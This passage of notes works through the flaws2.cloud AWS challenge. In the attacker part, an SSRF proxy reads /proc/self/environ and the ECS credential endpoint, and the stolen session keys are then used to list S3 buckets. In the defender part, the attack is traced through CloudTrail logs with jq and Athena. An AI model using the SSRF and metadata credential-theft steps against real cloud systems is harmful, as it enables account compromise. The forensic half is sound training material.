"DesiredStatus":"RESOURCES_PROVISIONED",
"KnownStatus":"RESOURCES_PROVISIONED",
"Limits":{"CPU":0, "Memory":0},
"CreatedAt":"2020-10-15T03:00:38.261874402Z",
"StartedAt":"2020-10-15T03:00:39.320526836Z",
"Type":"CNI_PAUSE",
"Networks":[ {"NetworkMode":"awsvpc", "IPv4Addresses":["172.31.60.122"]}]
},
{
"DockerId":"4d1e5f7ba388ca5e9aa7143fc4279078ec1f039d604d1ef09c726397e166c49f",
"Name":"level3",
"DockerName":"ecs-level3-3-level3-ccb4b080ebe3bfe8c901",
"Image":"653711331788.dkr.ecr.us-east-1.amazonaws.com/level2",
"ImageID":"sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621",
"Labels":{
"com.amazonaws.ecs.cluster":"arn:aws:ecs:us-east-1:653711331788:cluster/level3",
"com.amazonaws.ecs.container-name":"level3",
"com.amazonaws.ecs.task-arn":"arn:aws:ecs:us-east-1:653711331788:task/2742123a-ed28-4a62-b08b-8cc33d932f26",
"com.amazonaws.ecs.task-definition-family":"level3",
"com.amazonaws.ecs.task-definition-version":"3"
},
"DesiredStatus":"RUNNING",
"KnownStatus":"RUNNING",
"Limits":{"CPU":0, "Memory":0},
"CreatedAt":"2020-10-15T03:00:46.424280771Z",
"StartedAt":"2020-10-15T03:00:50.024889381Z",
"Type":"NORMAL",
"Networks":[{"NetworkMode":"awsvpc", "IPv4Addresses":["172.31.60.122"]}],
"Health":{
"status":"UNHEALTHY",
"statusSince":"2020-10-15T03:01:50.720417705Z",
"exitCode":-1,
"output":"OCI runtime exec failed: exec failed: container_linux.go:349: starting container process caused "exec: \\"exit 0\\": executable file not found in $PATH": unknown"
}
}
],
"Limits":{"CPU":0.25, "Memory":512},
"PullStartedAt":"2020-10-15T03:00:39.500173195Z",
"PullStoppedAt":"2020-10-15T03:00:46.409668199Z"
}
# there are actually 2 containers, the top one being Fargate’s Internal ECS Pause Container
- creds for the Task’s IAM Role aren’t just sitting there in the metadata like for EC2.
- Containers running via ECS on AWS have their creds at
169.254.170.2/v2/credentials/GUID
where the GUID is found from an environment variable
AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
- With ECS Fargate, each container has an environment variable
$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
- which contains the URI to retrieve these, which has some randomness in it.
- Retrieve environment variables from Linux's "magic" proc filesystem, at /proc/self/environ.
- From inside a container, we could query the credentials with the following command:
curl 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
- Retrieve the GUID from the container's environment variables:
root@e247007162e8:/var/www/html# cat /proc/self/environ
# HOSTNAME=e247007162e8TERM=xtermOLDPWD=/LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binPWD=/var/www/htmlSHLVL=1HOME=/root_=/bin/cat
root@e247007162e8:/var/www/html# cat /proc/self/environ | tr '\000' '\n'
https://container.target.flaws2.cloud/proxy/file:///proc/self/environ
# HOSTNAME=ip-172-31-60-122.ec2.internal
# HOME=/root
# AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/f39e12f6-f9aa-4a24-a46c-c6faf3071770
# AWS_EXECUTION_ENV=AWS_ECS_FARGATE
# AWS_DEFAULT_REGION=us-east-1
# ECS_CONTAINER_METADATA_URI_V4=https://169.254.170.2/v4/fea89204-6362-4166-8382-a0b00bc75f4f
# ECS_CONTAINER_METADATA_URI=https://169.254.170.2/v3/fea89204-6362-4166-8382-a0b00bc75f4f
# PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# AWS_REGION=us-east-1
# PWD=/
https://container.target.flaws2.cloud/proxy/https://169.254.170.2/v2/credentials/GUID
# {"code":"InvalidIdInRequest","message":"CredentialsV2Request: Credentials not found","HTTPErrorCode":400}
https://container.target.flaws2.cloud/proxy/https://169.254.170.2/v2/credentials/f39e12f6-f9aa-4a24-a46c-c6faf3071770
# {
# "RoleArn":"arn:aws:iam::653711331788:role/level3",
# "AccessKeyId":"ASIAZQNB3KHGC65V4W6M",
# "SecretAccessKey":"KGNtE8jM/RquOkzCzlVkbG1DEwSkAhHmGHsNYcdi",
# "Token":"IQoJb3JpZ2luX2VjEFIaCXVzLWVhc3QtMSJIMEYCIQCMuZj+m50efHqe0UhHbGvdcNjZ7n02hhiSU4QsPXNogQIhAL2lz7V8cvfrnDyaNtpbHlSfJSSI+utsoWIcnDWO/3sHKqIDCDsQAhoMNjUzNzExMzMxNzg4Igx5XPdNwsU3TkH7Jwkq/wKZkxSJ3IDwAxY+ID/Plqi/GpB94uarLhT2aSX05nO9R5D3wgYvgWz3GpPqHndxJh5WYlPgFxDXO/NkgQ7n0j18JIunwlZhZsv+lWwJ+xRQDMvFftyWoRXfX9W4il4FkGYHMYYcJOLhUak8HL3iK+e/2aXyHYzEjAYosJ1NZ8JtJc+N1isimx4YRockT7+OzTaVKxgQ3FPn5vwd3O+LY5bOby0sZ8FWmLSSk9cSl0yLNYCx9ZKtNboGzFGOR7s1TkcnoP/nKjz5h0BENj+HuuTD4bp54k+6S064g6qJp1kWOQoufbqiIhnWexH9Z0JHH7kp7Q1Beu/jiwxGGR6HCVZnx0QaCEphHB2VQ3YR/ciTmeajHzuRRQoZKw8Ge+x0BAAQor96kmI1nJSC5VFmA82y8IqeXZckOTniGvuT+g+i+NjrltVP6DcyNEA9Yk3XEjjULYT8AaVlfrxfIwF0goNkja6GzKEqk1cbmFbnq5ELG6lIa8vchmUjuv/1HihPDzCVlMOABjrqATzAiePLSs5IvHVyms++wnsbVaWjws0uM2KTADAN9FrIZy+CCsI069Y5xuipEyYLij7YUvEdW6pXQip/5198EFTNsj8qIughvPltA8ifHNYHmBjeo7qZkURDVzQTiMTDDKIMIqK+RgaVupnaI5DHoDTD4/+VXT4JJyjCESRPSVyCdx/+n45/Apxn4A7sVPYss8FDYu7DgzmYu6W84B0mE4n1VlT8yZyO56kZkBaIljssxfQwtXT6J0E+sj7fT6G7vFbTyaLlzxOmXSiZ2b9hWBNSDy8GcvtIlitEW5ByT53Y8M5oKBcIDcziCA==",
# "Expiration":"2021-01-27T08:04:05Z"
# }
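Before calling the CLI, store these values in a profile (named flaws3 here to match the calls below); a minimal sketch using aws configure set (the truncated session token must be the full Token value from the response above):
aws configure set aws_access_key_id ASIAZQNB3KHGC65V4W6M --profile flaws3
aws configure set aws_secret_access_key 'KGNtE8jM/RquOkzCzlVkbG1DEwSkAhHmGHsNYcdi' --profile flaws3
aws configure set aws_session_token 'IQoJb3JpZ2luX2VjEFIa...' --profile flaws3
aws configure set region us-east-1 --profile flaws3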
- Check the IAM identity with the stolen credentials
aws sts get-caller-identity \
--profile flaws3
# {
# "UserId": "AROAJQMBDNUMIKLZKMF64:2742123a-ed28-4a62-b08b-8cc33d932f26",
# "Account": "653711331788",
# "Arn": "arn:aws:sts::653711331788:assumed-role/level3/2742123a-ed28-4a62-b08b-8cc33d932f26"
# }
# The role doesn't have permissions to query IAM, but it can list S3 buckets:
aws s3 ls \
--profile flaws3
# 2018-11-20 14:50:08 flaws2.cloud
# 2018-11-20 13:45:26 level1.flaws2.cloud
# 2018-11-20 20:41:16 level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud
# 2018-11-26 14:47:22 level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud
# 2018-11-27 15:37:27 the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud
https://the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud/
Defender Track
Welcome Defender! As an incident responder we’re granting you access to the AWS account called “Security” as an IAM user.
- This account contains a copy of the logs during the time period of the incident
- and has the ability to assume into the “Security” role in the target account
- so you can look around to spot the misconfigurations that allowed for this attack to happen.
Credentials
Your IAM credentials to the Security account:
Login: https://flaws2-security.signin.aws.amazon.com/console
Account ID: 322079859186
Username: security
Password: password
Access Key: AKIAIUFNQ2WCOPTEITJQ
Secret Key: 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
Environment
The credentials above
- give you access to the Security account, which can assume the role “security” in the Target account.
- also give you access to an S3 bucket named flaws2-logs in the Security account, which contains the CloudTrail logs recorded during a successful compromise from the Attacker track.
Objective 1: Download CloudTrail logs
- Setup CLI
# download the CloudTrail logs.
# Configure the AWS CLI, or try aws-vault, which avoids storing the keys in plain text in your home directory (a common source of key leakage).
# Ensure this worked by running:
aws sts get-caller-identity \
--profile flawsd
# {
# "UserId": "AIDAJXZBU42TNFRNGBBFI",
# "Account": "322079859186",
# "Arn": "arn:aws:iam::322079859186:user/security"
# }
# list the buckets in the account (aws s3 ls), and you'll get back flaws2-logs.
aws s3 ls \
--profile flawsd
# 2018-11-19 15:54:31 flaws2-logs
- Download the logs
# download the CloudTrail logs with:
aws s3 sync s3://flaws2-logs . \
--profile flawsd
# get .json.gz files
# path AWSLogs/653711331788/CloudTrail/us-east-1/2018/11/28/.
# These are the CloudTrail logs for a successful hack.
# This S3 bucket is public so that you can reference it from Athena later.
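A quick sanity check that the sync pulled everything down (sketch):
find AWSLogs -type f -name '*.json.gz' | wc -l
# should report a handful of gzipped CloudTrail log files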
Objective 2: Access the Target account
A common AWS best practice:
- have a separate Security account that contains the CloudTrail logs from all other AWS accounts and also has some sort of access into the other accounts to check up on things.
- For this objective
- access the Target account through the IAM role that grants the Security account access.
# ~/.aws/config
[profile security]
region=us-east-1
output=json
# add a profile for the target to that file:
[profile target_security]
region=us-east-1
output=json
source_profile = security
role_arn = arn:aws:iam::653711331788:role/security
# now run the following:
# when the account ID is 322079859186, you are running in the Security account;
# when it is 653711331788, you are running in the context of the Target account.
aws sts get-caller-identity \
--profile flawsd
# {
# "UserId": "AIDAJXZBU42TNFRNGBBFI",
# "Account": "322079859186",
# "Arn": "arn:aws:iam::322079859186:user/security"
# }
aws sts get-caller-identity \
--profile target_security
# {
# "UserId": "AROAIKRY5GULQLYOGRMNS:botocore-session-1611721710",
# "Account": "653711331788",
# "Arn": "arn:aws:sts::653711331788:assumed-role/security/botocore-session-1611721710"
# }
# the S3 buckets for the levels of the Attacker path.
aws s3 ls \
--profile target_security
# 2018-11-20 14:50:08 flaws2.cloud
# 2018-11-20 13:45:26 level1.flaws2.cloud
# 2018-11-20 20:41:16 level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud
# 2018-11-26 14:47:22 level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud
# 2018-11-27 15:37:27 the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud
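The profile-based role assumption above is equivalent to an explicit STS call; a sketch (the session name ir-session is arbitrary, and this assumes the Security-account user credentials sit in the security profile):
aws sts assume-role \
  --role-arn arn:aws:iam::653711331788:role/security \
  --role-session-name ir-session \
  --profile security
# returns temporary AccessKeyId / SecretAccessKey / SessionToken for the Target account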
Objective 3: Use jq
digging into the log data
# have jq installed
# All the logs are in AWSLogs/653711331788/CloudTrail/us-east-1/2018/11/28/, but often you will have CloudTrail logs in lots of subdirectories, so it's helpful to be able to act on them all at once.
# Assuming your current working directory is inside a folder where you downloaded these files, and you don't have anything else there, gunzip the files by running the following, which finds all the files in every subdirectory, recursively, and attempts to gunzip them:
cd AWSLogs/653711331788/CloudTrail/us-east-1/2018/11/28
find . -type f -exec gunzip {} \;
# cat them through jq with:
find . -type f -exec cat {} \; | jq '.'
# You should see nicely formatted JSON data
# Let's just see the event names. Replace the jq query in the command above with:
find . -type f -exec cat {} \; | jq '.Records[].eventName'
# You should see:
# ...
# "GetObject"
# "GetObject"
# "GetObject"
# "GetObject"
# "ListBuckets"
# "AssumeRole"
# "AssumeRole"
# These are slightly out of order, so let's include the time.
# The -cr flags print compact raw output (one record per row),
# and |@tsv makes it tab-separated.
# Then it gets sorted by time, since that's the first column.
find . -type f -exec cat {} \; | jq -cr '.Records[]|[.eventTime, .eventName]|@tsv' | sort
# ...
# 2018-11-28T23:06:33Z GetDownloadUrlForLayer
# 2018-11-28T23:07:08Z GetObject
# 2018-11-28T23:07:08Z GetObject
# 2018-11-28T23:09:28Z ListBuckets
# 2018-11-28T23:09:36Z GetObject
# 2018-11-28T23:09:36Z GetObject
# Extending that even further, we can replace the jq part with:
find . -type f -exec cat {} \; | jq -cr '.Records[]|[.eventTime, .sourceIPAddress, .userIdentity.arn, .userIdentity.accountId, .userIdentity.type, .eventName]|@tsv' | sort
# then copy that into Excel or another spreadsheet which can sometimes make the data easier to work with.
2018-11-28T22:31:59Z ecs-tasks.amazonaws.com AWSService AssumeRole
2018-11-28T22:31:59Z ecs-tasks.amazonaws.com AWSService AssumeRole
2018-11-28T23:02:56Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:02:56Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:02:56Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:02:56Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:02:57Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:11Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:11Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:12Z 34.234.236.212 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole CreateLogStream
2018-11-28T23:03:12Z lambda.amazonaws.com AWSService AssumeRole
2018-11-28T23:03:13Z 34.234.236.212 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole CreateLogStream
2018-11-28T23:03:13Z apigateway.amazonaws.com AWSService Invoke
2018-11-28T23:03:14Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:17Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:18Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:20Z 34.234.236.212 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole CreateLogStream
2018-11-28T23:03:20Z apigateway.amazonaws.com AWSService Invoke
2018-11-28T23:03:35Z 34.234.236.212 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole CreateLogStream
2018-11-28T23:03:50Z 34.234.236.212 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole CreateLogStream
2018-11-28T23:04:54Z 104.102.221.250 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole ListObjects
2018-11-28T23:05:10Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:05:12Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:05:12Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:05:53Z 104.102.221.250 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole ListImages
2018-11-28T23:06:17Z 104.102.221.250 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole BatchGetImage
2018-11-28T23:06:33Z 104.102.221.250 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole GetDownloadUrlForLayer
2018-11-28T23:07:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:07:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:09:28Z 104.102.221.250 arn:aws:sts::653711331788:assumed-role/level3/d190d14a-2404-45d6-9113-4eda22d7f2c7 653711331788 AssumedRole ListBuckets
2018-11-28T23:09:36Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:09:36Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
# These logs mostly contain the attack,
# but you'll also notice logs for "AWSService" events as the Lambda and ECS resources obtained their roles.
# These are essentially logs of how AWS itself works, not actions anyone performed.
# There are also a lot of ANONYMOUS_PRINCIPAL, which are calls that did not involve an AWS principal. In this case, these are S3 requests from a web browser.
# If you look at the user-agent data (.userAgent) you'll see them as Chrome, as opposed to the AWS CLI.
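To summarize the activity quickly, you can also count how often each event name appears; a small sketch:
find . -type f -exec cat {} \; | jq -r '.Records[].eventName' | sort | uniq -c | sort -rn
# GetObject calls dominate; the rarer ECR and STS calls stand out near the bottom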
Objective 4: Identify credential theft
Focus on the ListBuckets call, which can be found with the jq query:
# 23:09:28Z 104.102.221.250 arn:aws:sts::653711331788:assumed-role/level3/d190d14a-2404-45d6-9113-4eda22d7f2c7 653711331788 AssumedRole ListBuckets
# Let's work our way backward through the hack, starting with the ListBuckets call:
find . -type f -exec cat {} \; | jq '.Records[]|select(.eventName=="ListBuckets")'
# {
# "eventVersion": "1.05",
# "userIdentity": {
# "type": "AssumedRole",
# "principalId": "AROAJQMBDNUMIKLZKMF64:d190d14a-2404-45d6-9113-4eda22d7f2c7",
# "arn": "arn:aws:sts::653711331788:assumed-role/level3/d190d14a-2404-45d6-9113-4eda22d7f2c7",
# "accountId": "653711331788",
# "accessKeyId": "ASIAZQNB3KHGNXWXBSJS",
# "sessionContext": {
# "attributes": {
# "mfaAuthenticated": "false",
# "creationDate": "2018-11-28T22:31:59Z"
# },
# "sessionIssuer": {
# "type": "Role",
# "principalId": "AROAJQMBDNUMIKLZKMF64",
# "arn": "arn:aws:iam::653711331788:role/level3",
# "accountId": "653711331788",
# "userName": "level3"
# }
# }
# },
# "eventTime": "2018-11-28T23:09:28Z",
# "eventSource": "s3.amazonaws.com",
# "eventName": "ListBuckets",
# "awsRegion": "us-east-1",
# "sourceIPAddress": "104.102.221.250",
# "userAgent": "[aws-cli/1.16.19 Python/2.7.10 Darwin/17.7.0 botocore/1.12.9]",
# "requestParameters": null,
# "responseElements": null,
# "requestID": "4698593B9338B27F",
# "eventID": "65e111a0-83ae-4ba8-9673-16291a804873",
# "eventType": "AwsApiCall",
# "recipientAccountId": "653711331788"
# }
# The IP here is 104.102.221.250, which is not an Amazon-owned IP. We'll treat this as the attacker's IP.
# This call came from the role level3, so let's look at that:
aws iam get-role \
--role-name level3 \
--profile target_security
# {
# "Role": {
# "Description": "Allows ECS tasks to call AWS services on your behalf.",
# "AssumeRolePolicyDocument": {
# "Version": "2012-10-17",
# "Statement": [
# {
# "Action": "sts:AssumeRole",
# "Principal": { "Service": "ecs-tasks.amazonaws.com" },
# "Effect": "Allow",
# "Sid": ""
# }
# ]
# },
# "MaxSessionDuration": 3600,
# "RoleId": "AROAJQMBDNUMIKLZKMF64",
# "CreateDate": "2018-11-23T17:55:27Z",
# "RoleName": "level3",
# "Path": "/",
# "Arn": "arn:aws:iam::653711331788:role/level3"
# }
# }
# this role is only supposed to be run by the ECS service, as the AssumeRolePolicyDocument is only allowing that Principal,
# but we just saw this IP clearly did not come from the AWS IP space
# We don't have logs from the webserver that is running the ECS container
# but we can assume from this one log event that it must have been hacked.
# Normally, you'd see the resource (the ECS task in this case) making AWS API calls from its own IP, which you could then compare against any new IPs.
# This concept is explained by Will Bengston in his talk "Detecting Credential Compromise in AWS".
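One way to apply that idea to these logs is to list every source IP seen per assumed role; a small jq sketch:
find . -type f -exec cat {} \; | jq -r '.Records[] | select(.userIdentity.type == "AssumedRole") | [.userIdentity.sessionContext.sessionIssuer.userName, .sourceIPAddress] | @tsv' | sort -u
# the level3 role appearing only from 104.102.221.250 (a non-AWS IP) is the red flag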
Objective 5: Identify the public resource
# Looking at earlier events from the CloudTrail logs, we'll see level1 calling ListImages, BatchGetImage, and GetDownloadUrlForLayer.
# Again, this is a compromised session credential, but we also want to see what happened here.
# Let's look at the ListImages call:
find . -type f -exec cat {} \; | jq '.Records[]|select(.eventName=="ListImages")'
# {
# "eventVersion": "1.04",
# "userIdentity": {
# "type": "AssumedRole",
# "principalId": "AROAIBATWWYQXZTTALNCE:level1",
# "arn": "arn:aws:sts::653711331788:assumed-role/level1/level1",
# "accountId": "653711331788",
# "accessKeyId": "ASIAZQNB3KHGIGYQXVVG",
# "sessionContext": {
# "attributes": { "mfaAuthenticated": "false",
# "creationDate": "2018-11-28T23:03:12Z" },
# "sessionIssuer": { "type": "Role",
# "principalId": "AROAIBATWWYQXZTTALNCE",
# "arn": "arn:aws:iam::653711331788:role/service-role/level1",
# "accountId": "653711331788",
# "userName": "level1" }
# }
# },
# "eventTime": "2018-11-28T23:05:53Z",
# "eventSource": "ecr.amazonaws.com",
# "eventName": "ListImages",
# "awsRegion": "us-east-1",
# "sourceIPAddress": "104.102.221.250",
# "userAgent": "aws-cli/1.16.19 Python/2.7.10 Darwin/17.7.0 botocore/1.12.9",
# "requestParameters": { "repositoryName": "level2",
# "registryId": "653711331788" },
# "responseElements": null,
# "requestID": "2780d808-f362-11e8-b13e-dbd4ed9d7936",
# "eventID": "eb0fa4a0-580f-4270-bd37-7e45dfb217aa",
# "resources": [ { "ARN": "arn:aws:ecr:us-east-1:653711331788:repository/level2",
# "accountId": "653711331788" } ],
# "eventType": "AwsApiCall",
# "recipientAccountId": "653711331788"
# }
# We can see the ListImages call event contains "repositoryName": "level2"
# We can check the policy by running:
aws ecr get-repository-policy \
--repository-name level2 \
--profile target_security
# {
# "registryId": "653711331788",
# "repositoryName": "level2",
# "policyText": "{\n \"Version\" : \"2008-10-17\",\n \"Statement\" : [ {\n \"Sid\" : \"AccessControl\",\n \"Effect\" : \"Allow\",\n \"Principal\" : \"*\",\n \"Action\" : [ \"ecr:GetDownloadUrlForLayer\", \"ecr:BatchGetImage\", \"ecr:BatchCheckLayerAvailability\", \"ecr:ListImages\", \"ecr:DescribeImages\" ]\n } ]\n}"
# }
# clean that up
aws ecr get-repository-policy \
--repository-name level2 \
--profile target_security | jq '.policyText|fromjson'
# {
# "Version": "2008-10-17",
# "Statement": [
# {
# "Sid": "AccessControl",
# "Effect": "Allow",
# "Principal": "*",
# "Action": [
# "ecr:GetDownloadUrlForLayer",
# "ecr:BatchGetImage",
# "ecr:BatchCheckLayerAvailability",
# "ecr:ListImages",
# "ecr:DescribeImages"
# ]
# }
# ]
# }
# Principal is "*": anyone in the world can perform these actions, which means this ECR repository is public.
# Ideally, you'd use a tool like CloudMapper to scan an account for public resources like this before you trace back an attack
Objective 6: Use Athena
Athena is great for incident response
- because you don’t have to wait for the data to load anywhere,
- just define the table in Athena and start querying it.
- You should also create partitions, which reduce costs by letting you query only against a specific day.
Explore the logs in a similar way as with jq, this time using the AWS service Athena.
- In the query editor, run:
create database flaws2;
- Switch to the flaws2 database just created and run:
CREATE EXTERNAL TABLE `cloudtrail`(
  `eventversion` string COMMENT 'from deserializer',
  `useridentity` struct<type:string,principalid:string,arn:string,accountid:string,invokedby:string,accesskeyid:string,username:string,sessioncontext:struct<attributes:struct<mfaauthenticated:string,creationdate:string>,sessionissuer:struct<type:string,principalid:string,arn:string,accountid:string,username:string>>> COMMENT 'from deserializer',
  `eventtime` string COMMENT 'from deserializer',
  `eventsource` string COMMENT 'from deserializer',
  `eventname` string COMMENT 'from deserializer',
  `awsregion` string COMMENT 'from deserializer',
  `sourceipaddress` string COMMENT 'from deserializer',
  `useragent` string COMMENT 'from deserializer',
  `errorcode` string COMMENT 'from deserializer',
  `errormessage` string COMMENT 'from deserializer',
  `requestparameters` string COMMENT 'from deserializer',
  `responseelements` string COMMENT 'from deserializer',
  `additionaleventdata` string COMMENT 'from deserializer',
  `requestid` string COMMENT 'from deserializer',
  `eventid` string COMMENT 'from deserializer',
  `resources` array<struct<arn:string,accountid:string,type:string>> COMMENT 'from deserializer',
  `eventtype` string COMMENT 'from deserializer',
  `apiversion` string COMMENT 'from deserializer',
  `readonly` string COMMENT 'from deserializer',
  `recipientaccountid` string COMMENT 'from deserializer',
  `serviceeventdetails` string COMMENT 'from deserializer',
  `sharedeventid` string COMMENT 'from deserializer',
  `vpcendpointid` string COMMENT 'from deserializer')
ROW FORMAT SERDE 'com.amazon.emr.hive.serde.CloudTrailSerde'
STORED AS INPUTFORMAT 'com.amazon.emr.cloudtrail.CloudTrailInputFormat'
OUTPUTFORMAT 'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'
LOCATION 's3://flaws2-logs/AWSLogs/653711331788/CloudTrail';
- now run:
select eventtime, eventname from cloudtrail;
run normal SQL queries against this data
SELECT eventname, count(*) AS mycount FROM cloudtrail GROUP BY eventname ORDER BY mycount;
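The same queries can also be run non-interactively from the CLI; a sketch (s3://YOUR-ATHENA-RESULTS/ is a placeholder results bucket you would replace):
aws athena start-query-execution \
  --query-string "SELECT eventtime, eventname, sourceipaddress FROM cloudtrail ORDER BY eventtime" \
  --query-execution-context Database=flaws2 \
  --result-configuration OutputLocation=s3://YOUR-ATHENA-RESULTS/ \
  --profile flawsd
# then fetch the results once it finishes:
# aws athena get-query-results --query-execution-id <id-from-previous-call> --profile flawsd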
script
Re-obtain the credentials
# crudini - a Python 2 utility for editing ini files
pip2 install --user crudini
# jq - a JSON processor
brew install jq
vim run.sh
#!/bin/bash
INFILE=~/.aws/credentials
PROFILE='flaws2'
res=`curl -s 'https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=x' | tail -n1`
AWS_ACCESS_KEY_ID=`echo $res | jq -r .AWS_ACCESS_KEY_ID`
AWS_SECRET_ACCESS_KEY=`echo $res | jq -r .AWS_SECRET_ACCESS_KEY`
AWS_SESSION_TOKEN=`echo $res | jq -r .AWS_SESSION_TOKEN`
AWS_REGION=`echo $res | jq -r .AWS_REGION`
echo "[$PROFILE]
REGION = $AWS_REGION
AWS_ACCESS_KEY_ID = $AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY = $AWS_SECRET_ACCESS_KEY
AWS_SESSION_TOKEN = $AWS_SESSION_TOKEN
" | crudini --merge $INFILE
echo "Set creds for profile $PROFILE in $INFILE"